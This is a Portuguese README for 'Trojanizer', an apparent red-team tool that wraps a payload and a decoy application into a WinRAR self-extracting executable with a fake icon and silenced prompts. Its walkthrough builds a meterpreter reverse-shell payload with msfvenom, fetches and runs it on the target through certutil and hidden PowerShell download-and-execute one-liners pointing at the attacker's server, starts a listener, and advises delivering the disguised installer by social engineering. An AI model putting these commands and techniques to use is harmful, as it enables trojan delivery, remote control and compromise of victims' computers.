
Trojanize seu payload - automatização do WinRAR (SFX) - em distribuições Linux
Version release : v1.1 (Stable)
Author : pedro ubuntu [ r00t-3xp10it ]
Codename: Troia_Revisited
Distros Suportadas : Ubuntu, Kali, Mint, Parrot OS
Suspicious-Shell-Activity (SSA) RedTeam desenvolvido @2017
A ferramenta Trojanizer usa WinRAR (SFX) para comprimir os dois arquivos fornecidos pelo usuário,
e os transforma em um arquivo executável SFX (.exe). O arquivo sfx, quando executado,
irá executar ambos os arquivos (nosso payload e o aplicativo legítimo ao mesmo tempo).
Para tornar o arquivo menos suspeito para o alvo no momento da execução, o trojanizer tentará
substituir o ícone padrão (.ico) do arquivo sfx por um selecionado pelo usuário,
e suprimir todas as mensagens de sandbox do arquivo SFX (Silent=1 | Overwrite=1).
'Trojanizer não constrói trojans, mas da perspectiva do alvo, ele replica o comportamento de trojan'
(execute o payload em segundo plano, enquanto o aplicativo legítimo é executado em primeiro plano).
Zenity (bash-GUIs) | Wine (x86|x64) | WinRAr.exe (instalado no wine)
"Trojanizer.sh fará o download/instalação de todas as dependências conforme necessário"
╔────────────────────────────────────────────────────────────────────────────────────────────╗
| É recomendado editar e configurar a opção: SYSTEM_ARCH=[ your_sys_arch ] |
| no arquivo 'settings' antes de tentar executar a ferramenta pela primeira vez. |
╚────────────────────────────────────────────────────────────────────────────────────────────╝
Trojanizer v1.1-Stable
.exe | .bat | .vbs | .ps1
"Todos os payloads que o windows/SFX pode extrair-executar automaticamente"
DICA: Se selecionado 'SINGLE_EXEC=ON' no arquivo settings,
então o trojanizer aceitará qualquer tipo de extensão para ser inserida.
.exe | .bat | .vbs | .ps1 | .jpg | .bmp | .doc | .ppt | etc ..
"Todas as aplicações que o windows/SFX pode extrair-executar automaticamente"
╔─────────────────────────────────────────────────────────────────────────────────────────╗
| As 'opções avançadas' do Trojanizer são acessíveis apenas no arquivo 'settings',|
| e podem ser configuradas apenas antes de executar a ferramenta principal (Trojanizer.sh) |
╚─────────────────────────────────────────────────────────────────────────────────────────╝
-- Opção avançada Presetup
Trojanizer pode ser configurado para executar um programa + comando antes da extração/execução
dos dois arquivos comprimidos (arquivo SFX). Isso permite que os usuários aproveitem software
pré-instalado para executar um comando remoto antes que a extração real ocorra no sistema alvo.
Se ativo, o trojanizer perguntará (sandbox zenity) pelo comando a ser executado
Trojanizer v1.1-Stable
-- single_file_execution
Vejamos o seguinte cenário: Você tem um payload dll para inserir que precisa ser executado
após a extração, mas arquivos sfx não podem executar diretamente arquivos dll. Esta configuração
permite que os usuários insiram um script batch (.bat) que será usado para executar o payload dll.
Tudo que o Trojanizer precisa fazer é instruir o arquivo SFX a extrair ambos os arquivos e
então executar o script.bat
Trojanizer v1.1-Stable
╔────────────────────────────────────────────────────────────────────────────────────────────────╗
| O comportamento padrão da opção single_file_execution é comprimir os dois arquivos fornecidos |
| pelo usuário, mas executar apenas um deles no momento da extração (o 2º arquivo fornecido |
| será executado) .. |
╚────────────────────────────────────────────────────────────────────────────────────────────────╝
╔────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╗
| Muito trabalho incrível foi feito por muitas pessoas, especialmente @subTee, sobre bypass de whitelisting |
| de aplicativos, que é basicamente o que queremos aqui: executar código arbitrário abusando de binários |
| embutidos da Microsoft. |
| https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/ |
╚────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╝
O exercício a seguir descreve como usar as opções avançadas 'single_file_execution' e 'Presetup' do trojanizer
para baixar (download remoto) e executar qualquer payload usando oneliners de bypass de whitelisting
de aplicativos com 'certutil' ou 'powershell' ..
1º - use o metasploit para construir nosso payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.69 LPORT=666 -f exe -o payload.exe
2º - copie payload.exe para a raiz web do apache2 e inicie o serviço
cp payload.exe /var/www/html/payload.exe
service apache2 start
3º - edite o arquivo 'settings' do Trojanizer e ative:
PRE_SETUP=ON
SINGLE_EXEC=ON
4º - executando a ferramenta trojanizer
PAYLOAD TO BE COMPRESSED => <path-to>/screenshot.png (não importa o que você comprimir)
EXECUTE THIS FILE UPON EXTRACTION => <path-to>/AngryBirds.exe (a ser executado como isca)
PRESETUP SANDBOX => cmd.exe /c certutil -urlcache -split -f http://192.168.1.69/payload.exe %TEMP%\\payload.exe && start %TEMP%\\payload.exe
SFX FILENAME => AngryBirds_installer (o nome do arquivo sfx a ser criado)
REPLACE ICON => Windows-Store.ico OR Steam-logo.ico
5º - inicie um listener e envie o arquivo sfx para o alvo usando engenharia social
msfconsole -x 'use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set lhost 192.168.1.69; set lport 666; exploit'
╔────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╗
| Quando o arquivo sfx for executado, ele baixará payload.exe do nosso servidor web apache2 para o alvo e |
| o executará antes de extrair 'screenshot.png' e 'AngryBirds.exe' (o último será executado para servir como isca) |
╚────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╝
O oneliner a seguir usa o método 'powershell(Downloadfile+start)' para alcançar o mesmo que o exercício anterior com 'certutil' ..
cmd.exe /c powershell.exe -w hidden -c (new-object System.Net.WebClient).Downloadfile('http://192.168.1.69/payload.exe', '%TEMP%\\payload.exe') & start '%TEMP%\\payload.exe'
O oneliner a seguir usa o método 'powershell(IEX+downloadstring)' para alcançar quase o mesmo (payload.ps1 não toca no disco)
cmd.exe /c powershell.exe -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.69/payload.ps1'))"
1º - Baixe o framework do github
git clone https://github.com/r00t-3xp10it/trojanizer.git
2º - Defina permissões de execução dos arquivos
cd trojanizer
sudo chmod +x *.sh
3º - configure o framework
nano settings
4º - Execute a ferramenta principal
sudo ./Trojanizer.sh
xsf.conf - executar ambos os arquivos após a extração (comportamento de trojan)
Trojanizer v1.1-Stable
xsf.conf - single_file_execution + Presetup (opções avançadas)
Trojanizer v1.1-Stable
xsf.conf - single_file_execution + Presetup + appl_whitelisting_bypass (certutil)
Trojanizer v1.1-Stable
xsf.conf - single_file_execution + Presetup + appl_whitelisting_bypass (powershell IEX)
Trojanizer v1.1-Stable
Arquivo sfx final com ícone alterado
Trojanizer v1.1-Stable
Dentro do arquivo sfx (abrir com winrar) - comportamento de trojan
Trojanizer v1.1-Stable
Dentro do arquivo sfx (abrir com winrar) - single_file_execution
Trojanizer v1.1-Stable
Trojanizer - instalador falso do antivírus AVG (comportamento de trojan)
https://www.youtube.com/watch?v=BIn6_ccZrI0
Trojanizer - single_file_execution (não comportamento de trojan)
https://www.youtube.com/watch?v=Ze0JkVtKbns
@subTee | @enigma0x3 | @H4d3s (SSA)
Referências:
http://acritum.com/software/manuals/winrar/
https://blog.conscioushacker.io/index.php/2017/11/17/application-whitelisting-bypass-msbuild-exe/
https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/
https://github.com/r00t-3xp10it/trojanizer/issues